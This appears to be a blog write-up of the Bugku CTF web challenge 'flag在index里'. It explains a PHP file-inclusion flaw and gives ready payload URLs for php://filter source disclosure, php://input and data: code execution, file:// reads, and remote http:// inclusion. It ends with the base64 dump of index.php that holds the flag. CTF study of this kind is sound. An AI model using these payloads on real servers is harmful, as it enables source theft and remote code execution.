Bugku web——flag在index里

打开题目链接,点击“click me”,发现其连接为:

http://123.206.87.240:8005/post/index.php?file=show.php

说明index.php使用了文件包含,因此可以利用php文件包含漏洞

此漏洞有下面几种利用方法

  1. php://filter
    使用方法:http://123.206.87.240:8005/post/index.php?file=php://filter/resource/file
    当file为非php文件时,导致include失败,并输出file内容
    当file为php文件时,会使include成功,并输出执行结果
    若想要将php文件输出,需要先进行base64编码:
	http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource/file

再将获得的编码解码即可

  1. php://input
    使用方法:将要执行的语法php代码直接通过post提交在这里插入图片描述

  2. file://
    使用方法:http://123.206.87.240:8005/post/index.php?file=file://var/www/index.html
    效果和php://filter相同,但注意只可使用绝对路径

  3. data:
    使用方法:http://123.206.87.240:8005/post/index.php?file=data: text/plain,<?php echo "hello"; >
    效果和php://input相同

  4. http://
    使用方法:http://123.206.87.240:8005/post/index.php?file=http://www.a.com/file
    上面几种属于本地包含,而http://为 外部包含,可包含网络上的文件

解出此题需要用到php://filter/read=convert.base64-encode/resource=index.php
获得base64码

PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LWN0ZjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2VkdWxjbmlfZWxpZl9sYWNvbF9zaV9zaWh0fQ0KPz4NCjwvaHRtbD4NCg==

解码可得到flag
在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值